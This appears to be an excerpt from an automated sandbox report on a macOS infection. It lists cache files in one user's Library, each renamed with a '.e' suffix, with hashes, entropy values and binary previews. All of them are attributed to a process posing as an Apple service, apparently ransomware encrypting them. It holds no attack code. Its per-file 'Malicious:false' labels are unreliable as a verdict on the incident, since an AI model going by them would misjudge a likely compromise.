                                                                                                    Preview: o....d....K...vj%m.v...h.0f....<kn....He..)+..6.0.....q....W...qP0.......d..........3r......j.,.............\/q..L.A....U...zY.G>.0..b.G..Lz\,.....O..g...n.;h......KF....9.f#.t..RCB...P..}.l...~h.....;......n...s......2...M...M..BK...&*.v..Z....xB...B.o...V.|...v...O..E.~A.\.t@.i...v.O.hv"..?JN.jb.NVw.xW.-.f._.$...p.].$..V4T.+......a.=.X......[:.w...../.2..l.#.-..?..).T[.G....$..K ..2...M...?..d..;......n5.Y...-.W.-.f._....S..ml$..V4T.+.`....>e..A....KqPT`X..l.(..u.3?._..Xt..\;.y...QE+N%.G{.Wa^.....zC...L2.........../.2..l...@.....).T[.G.2..P...$..2...M.%...`.`.;......n^a9.7...W.-.f._........P$..V4T.+....a.u.\P..A...3,......../.2..l. .9..F.X...KRmCC$l.........S.......,......0..O.....!..-.....a....D.}..$3|"..Y.s.p!..R.^4.......;......n.=.z....W.-.f._..:.D..if$..V4T.+.......#\P..A....W......../.2..lfsA...h].).T[.G. .).;Bf...2...M..$.l....c.A.@.H;.Ci.:\..P"R....R.....C;.T...:..|.>.W.g...-gx....[...%.o....,../+A=.i.'oI.B..j.^v$".IR.+.....!...\P..A....%......../.2..l.K....HQ.).T[.G.@a.+m2..
                                                                                                    /Users/ben/Library/Caches/com.apple.KeyboardViewer/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.2796670989949335
                                                                                                    Encrypted:false
                                                                                                    MD5:B85F480100363E5E7559D90BB0E3D7BF
                                                                                                    SHA1:9F81CB4B8F3940ECA57599D841E10D6AF70E02F4
                                                                                                    SHA-256:FDF63BBF63A95097433CFB35D8E76AE40A9AAE963A3A47757E922353F217C46C
                                                                                                    SHA-512:22C065C49B19367A05697A85299F038653CE86F9CA97B7ADF5B2FAB18857CEA9074C3573304EC1ED4E4D4F45E2C1E570BA2B6A28FA4B4EADFB2954AC0642297E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.KeyboardViewer/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.KeyboardViewer/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53589
                                                                                                    Entropy (8bit):3.57516132621608
                                                                                                    Encrypted:false
                                                                                                    MD5:38B9455308ECC5D60DD4BD82E0356999
                                                                                                    SHA1:DFD4D521E66F28A47268C3A1982B03B9E312F3C9
                                                                                                    SHA-256:722E804A7CA75073899BB558823AA0E50B0AC37D2B67E4175E2C115C3676FDEF
                                                                                                    SHA-512:C11563B7E157C5E4816BB52C54B57CB8C8B1FD54EE91AC7DFE97E62AAC037589FFCDD188CD421274841B6589BCCEB9A0F3639E81929962EE6024FC8E8CA4002D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..S..0..........U.....5.~./..efrt...7...t...7............L.D<.+.......]!7........Ax&..t..].;5.X...d~(....@8..`.8.........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.cache_delete/.CacheDeleteAnalytics.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):858
                                                                                                    Entropy (8bit):6.934236349479829
                                                                                                    Encrypted:false
                                                                                                    MD5:0D1174829C3770461422EBB223B2355E
                                                                                                    SHA1:70C51D624F0CB4D2EF43B299B734564AD9590E92
                                                                                                    SHA-256:1040636EBD11B6B01529611219EC60D5A543FFBAFE94CB175BE7577D742B97D9
                                                                                                    SHA-512:03097D8591932BEDEAD3688E674DB792E017EDEFC1DC91388049383D29AD4A0A107E283140D95BB3A11DE41A5D01055F4CDD6CD1FCB0ACAC7A7FF18A98C94666
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:........B..g....n..&.i)L.2b.Y.S.>..o@P.M>c#<.d....W........I............q....A.Z....Bc.`...(..'.fA....@....sa.`d5.........lv=)>.@....~u;...l...`....v.G./J...=.>a,.%.....{.I.......:...0}.=nW.....x..7..@....~u;...l...`....v.Gd....&.-.9..7...k..W9T..v......p..O~.0.......E.l.H.....h"..2H..a.....R.J..X.....;..k...zB.....H....!.o\.....BU...;.wTM.U.r.q..J..5"~..2.iN..[.....!];......B.s...)................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.cache_delete/.CacheDeleteRecentInfo_v2.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):4794
                                                                                                    Entropy (8bit):7.441088003165588
                                                                                                    Encrypted:false
                                                                                                    MD5:CD45D22CF62E885DDB5DBB55BBDE5CEA
                                                                                                    SHA1:68A04E2F3B58BF800B84C0DACC083FE143CE0CA9
                                                                                                    SHA-256:6900A5E7FCE8390520C3910F871C63FF421F0638953A5BDAC0152856008C195E
                                                                                                    SHA-512:326A6B0BB7F3938467A374426547ADDD05A8AF3CDE9EA7F248CD819083D905432A4F5C2DD8BAC0A8098272DE122C546D0EF895879B2926BC13F55C741E97C89C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..9........@y.....d~...7....Ec\..}jL...HX....u...Y.~T.......~tq......C.RV:.;.Q)....sp........],..\............[..?.t...]..#.h....$..B.w.?..`.p.g...R@..yr..T....>....4.#...Q....e.m...n.........I.e.j."..$..+.w...%.Z. .S;...shF.Q.j}...zk..#8.._....'T.Jko.....tM,s.....X..."....].a..h^-RZ.|A.......3.?.U..9..<............I......F.7H.8}....lZG.. .v/`$%.:...c..\.0..}"EH...5=Oz.L..f....l.Z...+..........8E'..q....9.....G.(..4w[...Q..............D..N...E].....R%....5..2..z.......\H....+.f.....#.C..O...y.bh.7...*?.x.4.q.?.f....v"v6"..K.....g..D..A..O....qq.....;......l.&.OV!..z$.+............x.v.u..........!......O...T. L..3-D....K...&..WEs..g..EeuI4./E...E....."}x.an..<Na.B.0#....7..F..z.<..^.EM. ...|r.E.Z8N.......L...p...,....C....LhI.v.......;..g..I....S.Civ&..rM.-..Dh.j>.I.....4c....[iU$fd.;.MN.z>...e_......!y.{......"<.a8..*b..}o..Km<...Br.-.....h.....M...%rRm.N.5.D..6..XUQ.y~P...#..g...%.-....8$..Z.K,>.......mS.%|.....O.8...Km<...dRG."..D....+..F.H.K.z(..)K..R..u4.......qz....S..8,t..C
                                                                                                    /Users/ben/Library/Caches/com.apple.commerce.safari/.SafariLibrary.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):762
                                                                                                    Entropy (8bit):6.817754310826266
                                                                                                    Encrypted:false
                                                                                                    MD5:A8C3D04FD65968CADCA980DEAD795CFD
                                                                                                    SHA1:7692243B6B9327CBC4D1AC07B338929E2806A693
                                                                                                    SHA-256:5AB1CD79F9F0D7F91CBD0FB56658346A78F9CE690B3015EEB5B8FE4222AFAFB3
                                                                                                    SHA-512:787ACEA4542D090D4A60F2A1B884ADE276D5E39BC7FFEF592778B147AFBF2413C9E65175971BE59A43718644C6156C2262CAAA00C843C41337FC587CCF742953
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....swC{&....5.J..d~...7....Ec\..}jL...HX....m......4j..q..;.}.18.AG.9...6E.V+...#.._.......r...p...........pU.........f.K27......-tM.c2.N...v.........6..7z`i0s.G.....$|.`Y..{1.T.T..l.#.....?sl[...e.......{.V>..o]D.........#.....c..$.35....../.O0..~V..\;.L.w.....y...<....FL.Z..K.x..%'.~....D.W!.....}Y...?k.......S-.0.U....B...^......(.".n...8....JRCa..........T.m#e...f9$....K.V\I/.C.jc..)3.e..L.FH.C..].7...?..2....B".......p..~)..............!MC...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.commerce.spotlight/.SpotlightLibrary.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):762
                                                                                                    Entropy (8bit):6.814401086991693
                                                                                                    Encrypted:false
                                                                                                    MD5:8FA0431541A9610CF817B5BB8FA03A69
                                                                                                    SHA1:C634539E602332A7D9397674441C8303C3FBCB33
                                                                                                    SHA-256:1AD8D9AA3FFA66643D4265F03EFB30FA506CD33CA3A6822813B745AA3243838B
                                                                                                    SHA-512:C8850A46E4DAC6B1A2990ED9A10AC02D9540A13B67D151A6DC6E5C48F19938664C324FCF4A7B0FB58F023F06330EE6D7D098AD4E05F7CA0EE9190C59C4650269
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....swC{&....5.J..d~...7....Ec\..}jL...HX....m......4j..q..;.}.18.AG.9...6E.V+...#.._.......r...p...........pU.........f.K27......-tM.c2.N...v.........6..7z`i0s.G.....$|.`Y..{1.T.T..l.#.....?sl[...e.......{.V>..o]D.........#.....c..$.35....../.O0..~V..\;.L.w.....y...<....FL.Z..K.x..%'.~....D.W!.....}Y...?k.......S-.0.U....B...^......(.".n...8....JRCa..........T.m#e...f9$....K.V\I/.C.jc..)3.e..L.FH.C..].7...?..2....B".......p..~)..............b6....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.commerce/.PurchasedBooks.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):634
                                                                                                    Entropy (8bit):6.439740009357822
                                                                                                    Encrypted:false
                                                                                                    MD5:9E9C3C1D5A4060E42EB1A34F69F722E7
                                                                                                    SHA1:315011FA9C08C658EA4E9A80CF57E2FB9046DBE9
                                                                                                    SHA-256:E77DAD730D58686FDB79A6EFE8D525F4E6C2AD407A6B71A1F7AAEA121DAA93F9
                                                                                                    SHA-512:4F784F502DCB9890AFBB961E30FD55E6424D383DF21C264C7F48F44EB2F77AA90436AC5CA8ADF7116974A4E464541582B1712444AABACCA085661FF147AAEDF6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.....yv=.3./L./.).d~...7....Ec\..}jL...HX.d{..D>....+.o...e|...C...W..._.sh%S.#....g~n.3B.5...N....~..X&hY.Z6..4........8.7z`i0s.G..|*|...Yz.qn...z...j....rC2.....a.)...N...6..L.q..S.......zW....Y:?...@35...... .Q....M..#.....0...BL..f..;...id..L,.B.z.......P..P.Z..Ng]B._!.d...+.G-.z.T....)....).7.F...?.v.........x...=.).I................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.commerce/.PurchasedMedia.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):634
                                                                                                    Entropy (8bit):6.444700966814803
                                                                                                    Encrypted:false
                                                                                                    MD5:827F2EA1B274FF703A3BC076CB68E2D8
                                                                                                    SHA1:579AD7CDAACFF3BA7F0122DD046B008809789C3C
                                                                                                    SHA-256:0196B5771528ACEA92718C23A45A249CE11416660FD92718A7C55AE049A71FA2
                                                                                                    SHA-512:62E7728E30EE7E063B08F2EF705400DC8BE3ECA279F50A15C1B28593F8842848BE9FDDF0099613E8F177F990FABD5940BEC6C7D587A3BA23F5C35B0EBAF387AC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R.....yv=.3./L./.).d~...7....Ec\..}jL...HX.d{..D>....+.o...e|...C...W..._.sh%S.#....g~n.3B.5...N....~..X&hY.Z6..4........8.7z`i0s.G..|*|...Yz.qn...z...j....rC2.....a.)...N...6..L.q..S.......zW....Y:?...@35...... .Q....M..#.....0...BL..f..;...id..L,.B.z.......P..P.Z..Ng]B._!.d...+.G-.z.T....)....).7.F...?.v..........Nv.....I................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.commerce/.SoftwareMap.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):618
                                                                                                    Entropy (8bit):6.486794610428751
                                                                                                    Encrypted:false
                                                                                                    MD5:0170492A44A78956B04F177191ED9C79
                                                                                                    SHA1:435A1BC90E347BF2DAB14AF129842B63526C38A4
                                                                                                    SHA-256:B19D93A2E708A27CB418849137DBBF6DB28737679CA5E2D848AB077BAFBDB340
                                                                                                    SHA-512:DE56BC9EA97BB67806C5CEBF3B7DF84E3D71719D461535BC6FA26C79E2F1761A0D00ED8F3DD95158F9238E6DB3FCBF7A73F9936C1551DE846AD98B7A85076502
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....rr.:mn...7....d~...7....Ec\..}jL...HX..5.4.,&.H..D9.eJ..;.8x....`d......"<Ue{.....vm..#sj..TYSi..].. .*N......s....j...R...)9..PzU/..F...7E.V+.....E.f:.5.|....E..t?p.;I...,"3......}q(.hW..|j>.?wQ.....E.q...C.".F.W'@.^.v.q..R.?...K..8K....w.L....&.....f..A.g6./....:..nl.s.T..\.!................{....W>..9................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.commerce/.UpdateOperationAudit.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):6.165620327027399
                                                                                                    Encrypted:false
                                                                                                    MD5:10B97B3F3D5C87198CB28A1B2D0EF8BB
                                                                                                    SHA1:8C6144FF1AAD42FF955E0C8167304CA7B0779984
                                                                                                    SHA-256:AB21E5996A53882830904D524309E24C11FCDD67415652DB109A4E7A6BC0D852
                                                                                                    SHA-512:FB4A077D39BD15DB7D716D756634AEA3A343977D07239D20B47BFBD38EB7BEA867AB94B5FFD47118FDD729B172F8FD4D5F9B5D39EFB481AA1FDB2A3065DF9DBD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:.......S....`...;.wTM.U.0D.[p......"it._!.\(I.@..O.r.c....GA...B._d...(..5..iu...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.commerce/.UpdateOperationAuditInfoCache-5103B509-753A-41D3-BFD5-5ADB3A3AB8FA.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):6.146207172691366
                                                                                                    Encrypted:false
                                                                                                    MD5:452CAB15575AFB8E459801851D1A98DA
                                                                                                    SHA1:11CB04EAEF702B3E36365C7E0A54FD53D85D5377
                                                                                                    SHA-256:7976BB7D3D82F55C2C97D5FC59E5E90A9B44BF6EDB58D8C8C20393E6F492D421
                                                                                                    SHA-512:B458A937082F522BF8269B094E39DDC312B5AC33D5ADC166FC650FDEFE1E9CB84F5C812A038CCE2188A14E3B9AEDB48B33483B6B462D53CA5FC6BFB9157B258C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:.......S....`...;.wTM.U.0D.[p......"it.;.4..xu...{:P_.....GA...B._d...(..5..iu...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.commerce/.updates.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):394
                                                                                                    Entropy (8bit):5.234124325509857
                                                                                                    Encrypted:false
                                                                                                    MD5:519D38B13E0AC090CB5D55525015D8E0
                                                                                                    SHA1:2D3FC3FA214A4EC19D918397E2AD242272244E23
                                                                                                    SHA-256:FD3A7C5F091561AB227A4981A2318DFD634237F238CC2CCF78E49F32D27EE8DD
                                                                                                    SHA-512:C89FDB2FEAE3C9281FB540CB78DE1C9CB4FAF4581633E9036B08493C466EFAC7EC0F20D4AACFC7667887B81B3C5E19DCA79F5C6C30BAA17372B7240948A3E746
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..........B^z."U. Y.a.a..sr.%.Orv.1..m........O1.9....|.. %W...a.i.........B`...q..Y................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.coreservices.uiagent/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.2796670989949335
                                                                                                    Encrypted:false
                                                                                                    MD5:B85F480100363E5E7559D90BB0E3D7BF
                                                                                                    SHA1:9F81CB4B8F3940ECA57599D841E10D6AF70E02F4
                                                                                                    SHA-256:FDF63BBF63A95097433CFB35D8E76AE40A9AAE963A3A47757E922353F217C46C
                                                                                                    SHA-512:22C065C49B19367A05697A85299F038653CE86F9CA97B7ADF5B2FAB18857CEA9074C3573304EC1ED4E4D4F45E2C1E570BA2B6A28FA4B4EADFB2954AC0642297E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.coreservices.uiagent/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.coreservices.uiagent/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53589
                                                                                                    Entropy (8bit):3.5730561443570683
                                                                                                    Encrypted:false
                                                                                                    MD5:40BEFF749B8CBEE0E4DF7ED2E7D08E6C
                                                                                                    SHA1:5903E6DBCC12A22D08743AE0D7171A62D7E84565
                                                                                                    SHA-256:6199DB6D4CA69E0A2FA03CA5A1E0418F25CE1949C0470672FEF88A3977E414D5
                                                                                                    SHA-512:1B1CF74FC4D86797ED645FC2FCDCE3B6C41DF450D296189D8D2B80A24A31AA623E46E22A69E0B5BE26ED64F667B8A35D2086E3FBB50C9FE0A92001EEFA08F981
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..S..0..........U.....5.~./..efrt...7...t...7............L.D<.+.......]!..1I............j.....".y.c.F0....h.X.3..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/.CSHelpIndex.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):13842
                                                                                                    Entropy (8bit):7.9590617629439695
                                                                                                    Encrypted:false
                                                                                                    MD5:FCC7770A13056A841F9A28A51F9108C4
                                                                                                    SHA1:6ED0DFC65B903EDDC6F95A4175385A97D8581633
                                                                                                    SHA-256:AED3C04174615F0552029E8AA5DDB75C183DDDB1C32EAAF000A07AA6809F9A80
                                                                                                    SHA-512:B08C61F1A40296EBF7A37BA8DBB5DAB79AA072CD1E040E8B69ACB59D3EB18EA40A35DC16B6B20ED1A577A525826341CAA3E9D977065F10314B99E14DC654DB8D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..j...z.R. ..z.....3.N.T.*d~...7....Ec\..}jL...HX....u...YB[.?..H@3..V\.......3H-)zg.b......0Y9.......#v.S......)*;.....E[..S...*...u...J..4..*\.o...^.%..........;.d.....?...."..\...P.\..T...h.Wk.G...S.OC.3E..Z.?.........2z..{e..XWn...K...y...0...[v=`W..).:q..........9y...O...........c.....P{....8m....$...F...w..O.aj{....:..1L>.JYj @......s....L.......Os.....O....{j.....i.Y....k.......A...t...c...i.t.....\.(.&2.QZ...>3...q.....qN.k..]Il.1)....~.c%..".~.........L$x......'..FA.|'.neJ....C...T.~...Z.>.8j.....z..7.x.y{..@O&..*..........m-d..y....~..t...T7.b<.g.,....m..5.3...Jp.aq.Q'..J8.!.6_.O_...+M.1...vb.,..wg.5A%....#..(..|.|.Cr...MX...H.N+....v7.D......l.m...Yv..........2...._.......r...p...g..U..<....A.....^!....9X..^G....b{f......A._..3.....w..a...Y......m..;...mA..z..j.c2K.......e.ZA..o...a.h.)'.#..O3#5.6..."..&.........i.;.[.....#.8.n....E.........H.M......p.k].{p...c%....5M.{/)S....b...P..i......X.z.;.{...eI...G.(.3./...K.h..g..t.l..*j.k....[..0...^(..n+&y..M..7../...k..L.CF
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):4.211562788632364
                                                                                                    Encrypted:false
                                                                                                    MD5:7E0064ACDA977EBBEA74422C2D323E06
                                                                                                    SHA1:CC6FDB016CFA74CAFB25D9921B3DE50880A83411
                                                                                                    SHA-256:A21EC323BB5C6A2570ED03DB187A2B809E7A642E48CDF805A2D21CCEEDF7C534
                                                                                                    SHA-512:E5AD604B2F6E3F1F9240F959127378AD4117DD3DDE46A807BEFF298F219CD421D7FF53A8C64B38DE12893EAA3441BF03BD21148D9347E3226080681EFC7D9ACF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L...4_.ei..^\V8C.#.D&Ca......`OTO../E.r!.>.k....L...4_.ei..^\V8C.#.D&Ca....|%.!..../E.r!............pT@9-.9.o..h$........(""t......R.Y.........N...........PD..^`.\\...q...(%..z7..R.Y...9...d...!8..A...E....N^..j.....nO6.D.zw...(%..z7.....i....(%..z7..............._..R.Y...S.G..e..!8..A...E....N^....o".xm..(%..z7d..~/.+.L.!}..#C.Y$.S....n......!8..A.....&..@.....0.`6..U..^.jO,..=-H|R..T.J...o/2.Z"\p........_w.c;..`..(%..z7....%=.G..(%..z7Kp..x.*Xd..~/.+...Os1.........,...T...u%.p..O..<..s.ut%...lg)...gT./H.A.fzL.Y.....KYB...&..]...Q..(%..z7j....^X5..(%..z7....%=.G..(%..z7L.!}..#C.Y$.S...E....N^...(%..z7....GE..VB~..G...g..gm,.9...d...d..~/.+..................y.H.....g..gm,.9...d...d..~/.+...........&..@...>.z.d1.j....#.'.y.H.....g..gm,.9...d...d..~/.+..........g....j.......c..w\..%...y.H.....g..gm,.9...d...d..~/.+.........h.:">.._......t..y.H.....g..gm,.9...d...d..~/.+.........o...+.iRj..... .....!&U-.y.H.....g..gm,.9...d...d..~/.+..............q9zh......\.%9j...cTu.tSQ.0..T...u%
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2065591
                                                                                                    Entropy (8bit):6.1013786455579995
                                                                                                    Encrypted:false
                                                                                                    MD5:DEB6B52F8CA36D169FA7B245CC677EE6
                                                                                                    SHA1:B5981229D86B0793E4D59332C972AE5AD51E5784
                                                                                                    SHA-256:98E5FF6BF3CCE308AB98C5954893E57E807BB07A0FAF7719CAB90415F293A2CE
                                                                                                    SHA-512:AAF07A228E0C72F0BA3E55847C3AD8BBBAF1E1E322C5FD240E9A2D27AC21AE3C1AFF1F3F90FADED722A46818F84295EA4F46A4CFE91013E35DF582FF1C00D016
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: @....[...L.-$.......`OTO...xnb..I+.....0....`OTO.D:r8...R_.X....I...~.n..M..5].Z2.=L/Ce.2...'y....Jk}=I...J;.}..G7.RYD.5bTE.-...#he......8......F.._.A./.........................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):197021
                                                                                                    Entropy (8bit):6.600170080142035
                                                                                                    Encrypted:false
                                                                                                    MD5:76D376C8A5E2B475E6613FFB1471FC9E
                                                                                                    SHA1:1AD6A5933C2ACE07D33705F2D6F619A821D76EEE
                                                                                                    SHA-256:2669331F71FE4F6EBADBD69500A89F93C6A21A40D9FABAF004D56379CA59AA95
                                                                                                    SHA-512:F171995FE6F46E5AF478765D4A5F918BB55E69B7A5FCD1C584481AB567259448F4B0AFAEF4E454955DD999F446B9C7CD258C0823B61B1ADF315072AEBFB7AD3A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t.{.2............U.....5.~./..efrt...7...t...7............L.D<.+.~.$O......1I............j.....".y.c.F0....h.X.3..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/.HelpCache.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):22707
                                                                                                    Entropy (8bit):7.973484778908503
                                                                                                    Encrypted:false
                                                                                                    MD5:F425FC964DED1242ECE0CAB56186A654
                                                                                                    SHA1:873D925817CDCF023E333673CFE11E80EBF83385
